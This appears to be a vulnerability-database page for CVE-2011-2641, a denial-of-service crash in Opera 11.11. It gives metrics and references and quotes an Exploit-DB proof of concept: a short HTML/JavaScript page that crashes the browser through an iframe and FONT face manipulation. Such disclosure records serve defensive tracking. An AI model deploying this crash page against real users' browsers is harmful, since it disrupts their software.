CVE-2011-2641 : Detail

CVE-2011-2641

4.16%V3
Network
2011-07-01
10h00 +00:00
2024-09-17
02h06 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Opera 11.11 allows remote attackers to cause a denial of service (application crash) by setting the FACE attribute of a FONT element within an IFRAME element after changing the SRC attribute of this IFRAME element to an about:blank value.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 17396

Publication date : 2011-06-13 22h00 +00:00
Author : echo
EDB Verified : Yes

<html> <body> <iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe> <script type="text/javascript" language="javascript"> /* * * Opera 11.11 Remote Crash * Software link: http://www.opera.com/download/ * Tested on: Win32 xp home sp 3 * CVE : null * * Im too lazy to deep analyze this ,but i thing is just unexploitable crash * so f****jixvt * ( dla klechis³awa i jego kosiarki :i ) * */ var a = window.document.getElementById('bo0om'); var b = a.contentDocument.createElement('font'); a.src='about:blank'; setTimeout('b.face = "h3h";',500); </script> </body> </html>

Products Mentioned

Configuraton 0

Opera>>Opera_browser >> Version 11.11

References

http://www.exploit-db.com/exploits/17396
Tags : exploit, x_refsource_EXPLOIT-DB